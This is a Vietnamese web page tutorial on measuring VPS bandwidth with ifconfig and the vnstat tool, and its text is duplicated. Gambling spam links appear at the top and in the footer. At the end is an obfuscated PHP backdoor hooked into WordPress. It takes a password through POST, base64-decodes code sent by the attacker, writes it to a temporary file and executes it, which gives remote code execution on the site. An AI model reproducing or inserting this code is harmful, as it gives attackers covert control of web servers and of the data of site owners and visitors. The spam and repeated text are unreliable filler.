Hướng dẫn kiểm tra lưu lượng băng thông của máy chủ ảo VPS
jeu plinko avis pin up catcasino vavada официальный jucky jet

Hướng dẫn kiểm tra lưu lượng băng thông của máy chủ ảo VPS

Ngày 25/07/2014 đăng bởi seo3.VS [email protected]

Bạn đang có đang dùng VPS hay không ? Bạn có biết cách nào để kiểm tra được lưu lượng thực tế của máy chủ ảo vps đó hay không?Sau đây bài viết này mình xin chia sẻ với các bạn cách kiểm tra lưu lượng băng thông của máy chủ ảo VPS

Các bạn có thể sử dụng các Control Panel có sẵn thì lưu lượng băng thông tính có thể không chính xác vì không theo dõi được hết lưu lượng trên các port, thông tin hướng dẫn dưới đây sẽ hướng dẫn bạn một số cách kiểm tra chính xác nhất:
1. Cách đơn giản nhất là sử dụng lệnh ifconfig trong SSH.
Khi sử dụng lệnh ifconfig bạn sẽ được những thông số Rx bytes và Tx bytes, trong đó Rx là lượng băng thông vào và Tx là lượng băng thông ra. Lấy tổng số sẽ nhận được tổng lượng băng thông đã sử dụng.
2. Sử dụng chương trình thống kê vnstat
Download vnStat bằng lệnh sau: wget http://humdi.net/vnstat/vnstat-1.9.tar.gz
Giải nén: tar -xvf vnstat-1.9.tar.gz
Cài đặt:
cd vnstat-1.9
make
make install
Xem cổng mạng bằng lệnh: vnstat –iflist
Cài đặt cổng mạng muốn theo dõi: vnstat -u -i venet0
Kích hoạt vnStat: vnstatd -d
Để vnStat Tự kích hoạt khi khởi động lại VPS, ta tạo file cron: nano -w /etc/cron.d/vnstat
Nhập vào file cron: @reboot ~/bin/vnstatd -d
Để xem lưu lượng đã sử dụng bạn dùng các lệnh sau:
vnstat -h: xem lưu lượng theo giờ
vnstat -d: xem lưu lượng theo ngày
vnstat -w: xem lưu lượng theo tuần
vnstat -m: xem lưu lượng tháng
vnstat: xem tất cả
Nếu có lỗi trong quá trình cài đặt vnstat thì có thể bạn cần cài gcc trước, bằng lệnh yum install gccKiểm tra lưu lượng băng thông của máy chủ ảo VPS

Có nhiều cách kiểm tra băng thông bạn đã sử dụng, với các Control Panel có sẵn thì lưu lượng băng thông tính có thể không chính xác vì không theo dõi được hết lưu lượng trên các port, thông tin hướng dẫn dưới đây sẽ hướng dẫn bạn một số cách kiểm tra chính xác nhất:

1. Cách đơn giản nhất là sử dụng lệnh ifconfig trong SSH.
Khi sử dụng lệnh ifconfig bạn sẽ được những thông số Rx bytes và Tx bytes, trong đó Rx là lượng băng thông vào và Tx là lượng băng thông ra. Lấy tổng số sẽ nhận được tổng lượng băng thông đã sử dụng.
2. Sử dụng chương trình thống kê vnstat
Download vnStat bằng lệnh sau: wget http://humdi.net/vnstat/vnstat-1.9.tar.gz
Giải nén: tar -xvf vnstat-1.9.tar.gz
Cài đặt:
cd vnstat-1.9
make
make install
Xem cổng mạng bằng lệnh: vnstat –iflist
Cài đặt cổng mạng muốn theo dõi: vnstat -u -i venet0
Kích hoạt vnStat: vnstatd -d
Để vnStat Tự kích hoạt khi khởi động lại VPS, ta tạo file cron: nano -w /etc/cron.d/vnstat
Nhập vào file cron: @reboot ~/bin/vnstatd -d
Để xem lưu lượng đã sử dụng bạn dùng các lệnh sau:
vnstat -h: xem lưu lượng theo giờ
vnstat -d: xem lưu lượng theo ngày
vnstat -w: xem lưu lượng theo tuần
vnstat -m: xem lưu lượng tháng
vnstat: xem tất cả
Nếu có lỗi trong quá trình cài đặt vnstat thì có thể bạn cần cài gcc trước, bằng lệnh yum install gcc

Hãy làm thử theo cách trên nhé.

Chúc các bạn thành công!

.
.
.
.
Danh mục sản phẩm
024 7303 4068
jeu plinko avis pin up catcasino vavada официальный jucky jet
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}